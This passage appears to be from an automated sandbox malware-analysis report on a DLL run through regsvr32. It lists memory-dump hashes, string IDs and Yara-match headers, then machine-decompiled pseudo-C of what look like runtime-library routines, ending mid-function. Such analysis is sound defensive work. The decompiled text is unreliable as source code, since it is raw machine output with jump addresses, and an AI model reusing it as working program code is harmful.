                                                                      • Instruction ID: 7e96aab5bcdf1bc90bff57d15b967d3f32477bc19d2c8dfaf9688cf8bccb9840
                                                                      • Opcode Fuzzy Hash: e480c7c465a98fbcdd0afdc1d78eafdf86582f2b7c0784f06b7ced6dd1bc7d72
                                                                      • Instruction Fuzzy Hash: 0841BEB580038ECFDF48CF64C88A5DE7BB0FB18358F111619E866A6260D3B89664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /Lv
                                                                      • API String ID: 0-704253135
                                                                      • Opcode ID: 112d7662cc817af51dafbb6f2ee6c2fb8ddf16d3fe8b8f7216e0ac48e18cc89b
                                                                      • Instruction ID: c550cca35adaf1e6d3870fc3f49c619cb3974968bba86910ede1628f9a092afd
                                                                      • Opcode Fuzzy Hash: 112d7662cc817af51dafbb6f2ee6c2fb8ddf16d3fe8b8f7216e0ac48e18cc89b
                                                                      • Instruction Fuzzy Hash: B141D2B190038E8FCB48CF64D88A5DE7BF1FB48348F114A19EC69A6210D3B4D665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L_^
                                                                      • API String ID: 0-754622948
                                                                      • Opcode ID: d1b03df2820e2cc0ce0ae03d4638ab07f690fccaa9bcc4f17aa91c0ca49e1aa0
                                                                      • Instruction ID: 87c0e96ba6ff8404d150f47fb66a01a22c54811402c3db3c59ee35fc723cf344
                                                                      • Opcode Fuzzy Hash: d1b03df2820e2cc0ce0ae03d4638ab07f690fccaa9bcc4f17aa91c0ca49e1aa0
                                                                      • Instruction Fuzzy Hash: 2B41C3B080038E8FCF48CF68C88A4CE7FF4FB58358F105A19E865A6220D3B49664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: % :x
                                                                      • API String ID: 0-4120043911
                                                                      • Opcode ID: 38caa38882d48d2083cbbc65288deac5da6445d736496d26baf4b63be7275748
                                                                      • Instruction ID: 6a58f287d56e091e9dd5e6a8a0c4792ec184725943c529ee77b607c7c046a8c9
                                                                      • Opcode Fuzzy Hash: 38caa38882d48d2083cbbc65288deac5da6445d736496d26baf4b63be7275748
                                                                      • Instruction Fuzzy Hash: 4241A0B590038E8FCF48CF68C88A5DE7BB0FB58358F114A1DE869A6250D3B49665CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ]RD
                                                                      • API String ID: 0-1645862574
                                                                      • Opcode ID: 9afaf5c6cfd3fbaf8fa7d068c76c86ea878a2912ebdef879fd5e0047c5592127
                                                                      • Instruction ID: 531404fe485ec253f6f01a8023624016be2ea94a36de1adb404a54a124fd44f3
                                                                      • Opcode Fuzzy Hash: 9afaf5c6cfd3fbaf8fa7d068c76c86ea878a2912ebdef879fd5e0047c5592127
                                                                      • Instruction Fuzzy Hash: 5A319EB55587848B8348DF28C14A41ABBE1FBCD30CF444B2DF8CAAB351D778D6458B4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J
                                                                      • API String ID: 0-2715717022
                                                                      • Opcode ID: bcf6dc899fbcb91a0bee9fbac6350301b6ac37db68a21cff8172de661a13f1c5
                                                                      • Instruction ID: 9ae35c2e153ec8b11cd082975d6cd9448764caaad902f9fae9422e63eb79af9b
                                                                      • Opcode Fuzzy Hash: bcf6dc899fbcb91a0bee9fbac6350301b6ac37db68a21cff8172de661a13f1c5
                                                                      • Instruction Fuzzy Hash: B0215AB06187848B8748DF28C45A41EBBE1FB8C35CF844B2DF4CAAB350D778D6458B4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($
                                                                      • API String ID: 0-618566098
                                                                      • Opcode ID: f4bbf270d67b1a36565ac944d9f6577768b50db76ab432e719456f0e2fec32ef
                                                                      • Instruction ID: 9f833481c7849a5430be6163f83f5fecebfafe98d4730f9e4b958e9374371eff
                                                                      • Opcode Fuzzy Hash: f4bbf270d67b1a36565ac944d9f6577768b50db76ab432e719456f0e2fec32ef
                                                                      • Instruction Fuzzy Hash: FE218EB491078E8FCF48DF68D84A4DF7BB0FB19318B000A19F86A96250D3B496A5CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E000000011800385E0(long long __rax) {
                                                                      				signed int _t3;
                                                                      
                                                                      				_t3 = GetProcessHeap();
                                                                      				 *0x80073d08 = __rax;
                                                                      				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                      			}




                                                                      0x1800385e4
                                                                      0x1800385ed
                                                                      0x1800385fb

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: 4f0f6f40cdc1abd7dfc787c9547b36ef8cc9811bd18b6855b98ace25772f5c27
                                                                      • Instruction ID: cc3b435261a832cb4181a2adeb80a839e6c304b895804211ed3cccdc42a804c8
                                                                      • Opcode Fuzzy Hash: 4f0f6f40cdc1abd7dfc787c9547b36ef8cc9811bd18b6855b98ace25772f5c27
                                                                      • Instruction Fuzzy Hash: C9B09230B03B08C2EA8A2B116C8234422A5BF8CB80FA4C018A00C81320DE2C06E94700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 57%
                                                                      			E00000001180011540(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				char _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t133;
                                                                      				void* _t136;
                                                                      				void* _t143;
                                                                      				unsigned int _t181;
                                                                      				signed char _t182;
                                                                      				signed short _t213;
                                                                      				intOrPtr _t216;
                                                                      				signed short _t225;
                                                                      				void* _t226;
                                                                      				signed long long _t297;
                                                                      				long long _t313;
                                                                      				intOrPtr* _t315;
                                                                      				long long _t316;
                                                                      				intOrPtr* _t317;
                                                                      				signed short* _t319;
                                                                      				void* _t333;
                                                                      				signed long long _t335;
                                                                      				signed int* _t339;
                                                                      				void* _t347;
                                                                      				signed long long _t348;
                                                                      				void* _t350;
                                                                      				void* _t356;
                                                                      				void* _t360;
                                                                      				signed long long _t363;
                                                                      				void* _t365;
                                                                      				intOrPtr _t366;
                                                                      				intOrPtr* _t367;
                                                                      
                                                                      				_t360 = __r10;
                                                                      				_t341 = __rbp;
                                                                      				_t338 = __rsi;
                                                                      				_t315 = __rcx;
                                                                      				_t216 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t348 = _t347 - 0x50;
                                                                      				_t297 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t297 ^ _t348;
                                                                      				_t133 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t313 = __rcx;
                                                                      				_t6 = _t338 - 0x20; // 0x58
                                                                      				_t225 = _t6;
                                                                      				_t7 = _t338 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t226 = _t133 - 0x64;
                                                                      				if (_t226 > 0) goto 0x800115f6;
                                                                      				if (_t226 == 0) goto 0x80011667;
                                                                      				if (_t133 == 0x41) goto 0x80011674;
                                                                      				if (_t133 == 0x43) goto 0x800115d3;
                                                                      				if (_t133 - 0x44 <= 0) goto 0x80011680;
                                                                      				if (_t133 - 0x47 <= 0) goto 0x80011674;
                                                                      				if (_t133 == 0x53) goto 0x80011629;
                                                                      				if (_t133 == _t225) goto 0x800115e9;
                                                                      				if (_t133 == 0x5a) goto 0x800115df;
                                                                      				if (_t133 == 0x61) goto 0x80011674;
                                                                      				if (_t133 != 0x63) goto 0x80011680;
                                                                      				E00000001180011A2C(__rcx, __rcx, __rsi, __rbp, _t350);
                                                                      				goto 0x80011679;
                                                                      				E00000001180011B24(__rcx, __rcx, _t338);
                                                                      				goto 0x80011679;
                                                                      				_t136 = E0000000118001BDDC(r12b, 0x78, _t313, _t315, _t333, _t338);
                                                                      				goto 0x80011679;
                                                                      				if (_t136 - 0x67 <= 0) goto 0x80011674;
                                                                      				if (_t136 == 0x69) goto 0x80011667;
                                                                      				if (_t136 == 0x6e) goto 0x80011660;
                                                                      				if (_t136 == 0x6f) goto 0x80011640;
                                                                      				if (_t136 == 0x70) goto 0x80011630;
                                                                      				if (_t136 == 0x73) goto 0x80011629;
                                                                      				if (_t136 == 0x75) goto 0x8001166b;
                                                                      				if (_t136 != 0x78) goto 0x80011680;
                                                                      				goto 0x800115ec;
                                                                      				E00000001180011BBC(_t313, _t315, _t338, _t341);
                                                                      				goto 0x80011679;
                                                                      				 *((intOrPtr*)(_t315 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t315 + 0x34)) = 0xb;
                                                                      				goto 0x800115e9;
                                                                      				_t181 =  *(_t315 + 0x28);
                                                                      				if ((r12b & _t181 >> 0x00000005) == 0) goto 0x80011654;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t313 + 0x28) = _t181;
                                                                      				_t316 = _t313;
                                                                      				E0000000118001C00C(0, 0x78, _t313, _t316, _t333, _t338);
                                                                      				goto 0x80011679;
                                                                      				E00000001180011FD4(_t316);
                                                                      				goto 0x80011679;
                                                                      				 *(_t316 + 0x28) =  *(_t316 + 0x28) | 0x00000010;
                                                                      				E0000000118001C23C(0, 0x78, _t313, _t316, _t333, _t338);
                                                                      				goto 0x80011679;
                                                                      				_t143 = E00000001180011CE8(0, r12b & _t181 >> 0x00000005, _t313, _t316, _t341);
                                                                      				r13d = 0;
                                                                      				if (_t143 != 0) goto 0x80011687;
                                                                      				goto 0x800119f9;
                                                                      				if ( *((intOrPtr*)(_t313 + 0x474)) != 2) goto 0x8001169d;
                                                                      				if ( *((intOrPtr*)(_t313 + 0x470)) == r12d) goto 0x800119f6;
                                                                      				if ( *((intOrPtr*)(_t313 + 0x38)) != r13b) goto 0x800119f6;
                                                                      				_t182 =  *(_t313 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r10d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x800116fb;
                                                                      				if ((r12b & 0) == 0) goto 0x800116dd;
                                                                      				_v68 = _t360 + 0xd;
                                                                      				goto 0x800116f8;
                                                                      				if ((r12b & _t182) == 0) goto 0x800116e9;
                                                                      				goto 0x800116d6;
                                                                      				if ((r12b & 0) == 0) goto 0x800116fb;
                                                                      				_v68 = r10w;
                                                                      				_t335 = _t363;
                                                                      				_t213 =  *(_t313 + 0x3a) & 0x0000ffff;
                                                                      				r9d = 0xffdf;
                                                                      				if ((r9w & (_t213 & 0x0000ffff) - _t225) != 0) goto 0x8001171e;
                                                                      				r8b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x80011721;
                                                                      				r8b = r13b;
                                                                      				r9d = 0x30;
                                                                      				if (r8b != 0) goto 0x8001173a;
                                                                      				if (0 == 0) goto 0x80011757;
                                                                      				 *(_t348 + 0x34 + _t335 * 2) = r9w;
                                                                      				if (_t213 == _t225) goto 0x8001174b;
                                                                      				if (_t213 != 0x41) goto 0x8001174e;
                                                                      				 *((short*)(_t348 + 0x36 + _t335 * 2)) = _t225 & 0x0000ffff;
                                                                      				r15d =  *((intOrPtr*)(_t313 + 0x2c));
                                                                      				r14d = 0xffff;
                                                                      				r15d = r15d -  *((intOrPtr*)(_t313 + 0x48));
                                                                      				r15d = r15d - _t216;
                                                                      				if ((_t182 & 0x0000000c) != 0) goto 0x800117d2;
                                                                      				if (r15d <= 0) goto 0x800117d2;
                                                                      				if ((r12b &  *( *((intOrPtr*)(_t313 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x80011798;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t313 + 0x460)) + 8)) == _t365) goto 0x800117b6;
                                                                      				if (E0000000118003EB68(r10d, _t213, _t313,  *((intOrPtr*)(_t313 + 0x460)),  *((intOrPtr*)(_t313 + 8)), _t356) == r14w) goto 0x800117ce;
                                                                      				r10d = 0x20;
                                                                      				 *(_t313 + 0x20) = _t316 + 1;
                                                                      				if ( *(_t313 + 0x20) == 0xfffffffe) goto 0x800117d2;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x80011779;
                                                                      				goto 0x800117d2;
                                                                      				 *(_t313 + 0x20) =  *(_t313 + 0x20) | 0xffffffff;
                                                                      				_t367 = _t313 + 0x460;
                                                                      				_t339 = _t313 + 0x20;
                                                                      				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x800117fc;
                                                                      				if ( *((intOrPtr*)( *_t367 + 8)) != _t365) goto 0x800117fc;
                                                                      				 *_t339 =  *_t339 + _t216;
                                                                      				goto 0x80011814;
                                                                      				_v88 =  *((intOrPtr*)(_t313 + 8));
                                                                      				r8d = _t216;
                                                                      				_t317 = _t367;
                                                                      				E00000001180009E20(_t313, _t317,  &_v68, _t339,  *((intOrPtr*)(_t313 + 8)), _t339);
                                                                      				if ((r12b & 0) == 0) goto 0x8001187f;
                                                                      				if ((r12b &  *(_t313 + 0x28) >> 0x00000002) != 0) goto 0x8001187f;
                                                                      				if (r15d <= 0) goto 0x8001187f;
                                                                      				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x8001184c;
                                                                      				if ( *((intOrPtr*)( *_t367 + 8)) == _t365) goto 0x80011866;
                                                                      				if (E0000000118003EB68(0x30, _t213, _t313,  *_t367,  *((intOrPtr*)(_t313 + 8)), _t339) == 0xffff) goto 0x8001187c;
                                                                      				_t85 = _t317 + 1; // 0x10000
                                                                      				 *_t339 = _t85;
                                                                      				if ( *_t339 == 0xfffffffe) goto 0x8001187f;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x80011835;
                                                                      				goto 0x8001187f;
                                                                      				 *_t339 =  *_t339 | 0xffffffff;
                                                                      				if ( *((intOrPtr*)(_t313 + 0x4c)) != r13b) goto 0x800119b0;
                                                                      				if ( *((intOrPtr*)(_t313 + 0x48)) <= 0) goto 0x800119b0;
                                                                      				_t366 =  *((intOrPtr*)(_t313 + 8));
                                                                      				if ( *((intOrPtr*)(_t366 + 0x28)) != 0) goto 0x800118ad;
                                                                      				E00000001180006E80( *_t367, _t313, _t366,  *_t367, _t339);
                                                                      				if ( *((intOrPtr*)(_t313 + 0x48)) == 0) goto 0x80011932;
                                                                      				_v72 = 0;
                                                                      				_t319 =  &_v72;
                                                                      				if (E0000000118003E80C(0, _t225, _t313, _t319,  *((intOrPtr*)(_t313 + 0x40)), _t335 + 2, _t339,  *((intOrPtr*)(_t313 + 0x40)),  *((intOrPtr*)( *((intOrPtr*)(_t366 + 0x18)) + 8)),  *((intOrPtr*)(_t313 + 8))) <= 0) goto 0x800119a4;
                                                                      				if (( *( *_t367 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80011901;
                                                                      				if ( *((long long*)( *_t367 + 8)) == 0) goto 0x80011913;
                                                                      				if (E0000000118003EB68(_v72 & 0x0000ffff,  *( *_t367 + 0x14) >> 0xc, _t313,  *_t367,  *((intOrPtr*)(_t313 + 8)),  *((intOrPtr*)(_t313 + 8))) == 0xffff) goto 0x80011918;
                                                                      				 *(_t313 + 0x20) =  *(_t313 + 0x20) + 1;
                                                                      				goto 0x8001191c;
                                                                      				 *(_t313 + 0x20) =  *(_t313 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				if (0 + r12d !=  *((intOrPtr*)(_t313 + 0x48))) goto 0x800118b7;
                                                                      				r13d = 0;
                                                                      				if ( *_t339 - r13d < 0) goto 0x800119f6;
                                                                      				if ((r12b & 0) == 0) goto 0x800119f6;
                                                                      				if (r15d <= 0) goto 0x800119f6;
                                                                      				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x80011974;
                                                                      				if ( *((intOrPtr*)( *_t367 + 8)) == _t366) goto 0x8001198e;
                                                                      				if (E0000000118003EB68(0x20,  *( *_t367 + 0x14) >> 0xc, _t313,  *_t367,  *((intOrPtr*)(_t313 + 8)),  *((intOrPtr*)(_t313 + 8))) == 0xffff) goto 0x800119f3;
                                                                      				_t117 = _t319 + 1; // 0x10000
                                                                      				 *_t339 = _t117;
                                                                      				if ( *_t339 == 0xfffffffe) goto 0x800119f6;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8001195d;
                                                                      				goto 0x800119f6;
                                                                      				 *(_t313 + 0x20) =  *(_t313 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				goto 0x80011932;
                                                                      				r8d =  *((intOrPtr*)(_t313 + 0x48));
                                                                      				if ((r12b &  *( *_t367 + 0x14) >> 0x0000000c) == 0) goto 0x800119db;
                                                                      				if ( *((intOrPtr*)( *_t367 + 8)) != _t366) goto 0x800119db;
                                                                      				 *_t339 =  *_t339 + r8d;
                                                                      				goto 0x80011935;
                                                                      				_v88 =  *((intOrPtr*)(_t313 + 8));
                                                                      				E00000001180009E20(_t313, _t367,  *((intOrPtr*)(_t313 + 0x40)), _t339,  *((intOrPtr*)(_t313 + 0x40)) + _t170, _t339);
                                                                      				goto 0x80011935;
                                                                      				 *_t339 =  *_t339 | 0xffffffff;
                                                                      				return E00000001180002FB0(r12b,  *( *_t367 + 0x14) >> 0xc, _v56 ^ _t348);
                                                                      			}





































                                                                      0x180011540
                                                                      0x180011540
                                                                      0x180011540
                                                                      0x180011540
                                                                      0x180011540
                                                                      0x180011540
                                                                      0x180011545
                                                                      0x18001154a
                                                                      0x180011558
                                                                      0x18001155c
                                                                      0x180011566
                                                                      0x18001156b
                                                                      0x180011574
                                                                      0x180011577
                                                                      0x180011577
                                                                      0x18001157a
                                                                      0x18001157a
                                                                      0x18001157e
                                                                      0x180011582
                                                                      0x180011584
                                                                      0x18001158e
                                                                      0x180011598
                                                                      0x18001159e
                                                                      0x1800115a8
                                                                      0x1800115b2
                                                                      0x1800115b7
                                                                      0x1800115bd
                                                                      0x1800115c3
                                                                      0x1800115cd
                                                                      0x1800115d5
                                                                      0x1800115da
                                                                      0x1800115df
                                                                      0x1800115e4
                                                                      0x1800115ec
                                                                      0x1800115f1
                                                                      0x1800115fa
                                                                      0x180011600
                                                                      0x180011606
                                                                      0x18001160c
                                                                      0x180011612
                                                                      0x180011618
                                                                      0x18001161e
                                                                      0x180011623
                                                                      0x180011627
                                                                      0x180011629
                                                                      0x18001162e
                                                                      0x180011630
                                                                      0x180011637
                                                                      0x18001163e
                                                                      0x180011640
                                                                      0x18001164b
                                                                      0x18001164d
                                                                      0x180011651
                                                                      0x180011656
                                                                      0x180011659
                                                                      0x18001165e
                                                                      0x180011660
                                                                      0x180011665
                                                                      0x180011667
                                                                      0x18001166d
                                                                      0x180011672
                                                                      0x180011674
                                                                      0x180011679
                                                                      0x18001167e
                                                                      0x180011682
                                                                      0x18001168e
                                                                      0x180011697
                                                                      0x1800116a1
                                                                      0x1800116a7
                                                                      0x1800116ac
                                                                      0x1800116b3
                                                                      0x1800116b8
                                                                      0x1800116c6
                                                                      0x1800116d0
                                                                      0x1800116d6
                                                                      0x1800116db
                                                                      0x1800116e0
                                                                      0x1800116e7
                                                                      0x1800116f0
                                                                      0x1800116f2
                                                                      0x1800116f8
                                                                      0x1800116fb
                                                                      0x1800116ff
                                                                      0x18001170f
                                                                      0x180011713
                                                                      0x18001171c
                                                                      0x18001171e
                                                                      0x180011728
                                                                      0x180011734
                                                                      0x180011738
                                                                      0x18001173a
                                                                      0x180011743
                                                                      0x180011749
                                                                      0x18001174e
                                                                      0x180011757
                                                                      0x18001175b
                                                                      0x180011761
                                                                      0x180011765
                                                                      0x18001176b
                                                                      0x180011777
                                                                      0x180011789
                                                                      0x180011796
                                                                      0x1800117ae
                                                                      0x1800117b0
                                                                      0x1800117bc
                                                                      0x1800117c2
                                                                      0x1800117ca
                                                                      0x1800117cc
                                                                      0x1800117ce
                                                                      0x1800117d6
                                                                      0x1800117e0
                                                                      0x1800117ed
                                                                      0x1800117f6
                                                                      0x1800117f8
                                                                      0x1800117fa
                                                                      0x1800117fc
                                                                      0x180011809
                                                                      0x18001180c
                                                                      0x18001180f
                                                                      0x18001181f
                                                                      0x180011827
                                                                      0x180011833
                                                                      0x180011841
                                                                      0x18001184a
                                                                      0x180011864
                                                                      0x180011868
                                                                      0x18001186b
                                                                      0x180011870
                                                                      0x180011878
                                                                      0x18001187a
                                                                      0x18001187c
                                                                      0x180011883
                                                                      0x18001188e
                                                                      0x180011894
                                                                      0x18001189e
                                                                      0x1800118a3
                                                                      0x1800118b5
                                                                      0x1800118c2
                                                                      0x1800118c7
                                                                      0x1800118da
                                                                      0x1800118f5
                                                                      0x1800118ff
                                                                      0x180011911
                                                                      0x180011913
                                                                      0x180011916
                                                                      0x180011918
                                                                      0x18001191f
                                                                      0x180011930
                                                                      0x180011932
                                                                      0x180011938
                                                                      0x180011947
                                                                      0x180011957
                                                                      0x180011969
                                                                      0x180011972
                                                                      0x18001198c
                                                                      0x180011990
                                                                      0x180011993
                                                                      0x180011998
                                                                      0x1800119a0
                                                                      0x1800119a2
                                                                      0x1800119a4
                                                                      0x1800119a8
                                                                      0x1800119ae
                                                                      0x1800119b7
                                                                      0x1800119c8
                                                                      0x1800119d1
                                                                      0x1800119d3
                                                                      0x1800119d6
                                                                      0x1800119db
                                                                      0x1800119e9
                                                                      0x1800119ee
                                                                      0x1800119f3
                                                                      0x180011a23

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7ff1fdfc353fad8e396267343157bc95010d0055f291f9a33c77cd3835069fc
                                                                      • Instruction ID: 84208d8cc65a5800632b768114702219e18ded799c4bf300c670aaf78388727d
                                                                      • Opcode Fuzzy Hash: d7ff1fdfc353fad8e396267343157bc95010d0055f291f9a33c77cd3835069fc
                                                                      • Instruction Fuzzy Hash: 6BE1D336204A498AEBEEDE29D0503EA37A1F748BD9F58C215EE95473D4DF35CA4AC700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118000A734(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				char _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t131;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				unsigned int _t179;
                                                                      				signed char _t180;
                                                                      				signed short _t211;
                                                                      				intOrPtr _t214;
                                                                      				signed short _t223;
                                                                      				void* _t224;
                                                                      				signed long long _t293;
                                                                      				long long _t309;
                                                                      				long long _t311;
                                                                      				intOrPtr* _t312;
                                                                      				intOrPtr* _t313;
                                                                      				signed short* _t315;
                                                                      				signed long long _t330;
                                                                      				signed int* _t334;
                                                                      				void* _t342;
                                                                      				signed long long _t343;
                                                                      				void* _t345;
                                                                      				void* _t351;
                                                                      				void* _t355;
                                                                      				signed long long _t358;
                                                                      				void* _t360;
                                                                      				intOrPtr _t361;
                                                                      				intOrPtr* _t362;
                                                                      
                                                                      				_t355 = __r10;
                                                                      				_t336 = __rbp;
                                                                      				_t333 = __rsi;
                                                                      				_t311 = __rcx;
                                                                      				_t214 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t343 = _t342 - 0x50;
                                                                      				_t293 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t293 ^ _t343;
                                                                      				_t131 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t309 = __rcx;
                                                                      				_t6 = _t333 - 0x20; // 0x58
                                                                      				_t223 = _t6;
                                                                      				_t7 = _t333 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t224 = _t131 - 0x64;
                                                                      				if (_t224 > 0) goto 0x8000a7ea;
                                                                      				if (_t224 == 0) goto 0x8000a85b;
                                                                      				if (_t131 == 0x41) goto 0x8000a868;
                                                                      				if (_t131 == 0x43) goto 0x8000a7c7;
                                                                      				if (_t131 - 0x44 <= 0) goto 0x8000a874;
                                                                      				if (_t131 - 0x47 <= 0) goto 0x8000a868;
                                                                      				if (_t131 == 0x53) goto 0x8000a81d;
                                                                      				if (_t131 == _t223) goto 0x8000a7dd;
                                                                      				if (_t131 == 0x5a) goto 0x8000a7d3;
                                                                      				if (_t131 == 0x61) goto 0x8000a868;
                                                                      				if (_t131 != 0x63) goto 0x8000a874;
                                                                      				E0000000118000AC0C(__rcx, __rcx, __rdx, __rsi, _t345);
                                                                      				goto 0x8000a86d;
                                                                      				E0000000118000ACD0(__rcx, __rcx, _t333);
                                                                      				goto 0x8000a86d;
                                                                      				_t134 = E0000000118001DE4C(r12b, __rcx, __rcx, _t333, __rbp);
                                                                      				goto 0x8000a86d;
                                                                      				if (_t134 - 0x67 <= 0) goto 0x8000a868;
                                                                      				if (_t134 == 0x69) goto 0x8000a85b;
                                                                      				if (_t134 == 0x6e) goto 0x8000a854;
                                                                      				if (_t134 == 0x6f) goto 0x8000a834;
                                                                      				if (_t134 == 0x70) goto 0x8000a824;
                                                                      				if (_t134 == 0x73) goto 0x8000a81d;
                                                                      				if (_t134 == 0x75) goto 0x8000a85f;
                                                                      				if (_t134 != 0x78) goto 0x8000a874;
                                                                      				goto 0x8000a7e0;
                                                                      				E0000000118000AD4C(__rcx, __rcx, _t333);
                                                                      				goto 0x8000a86d;
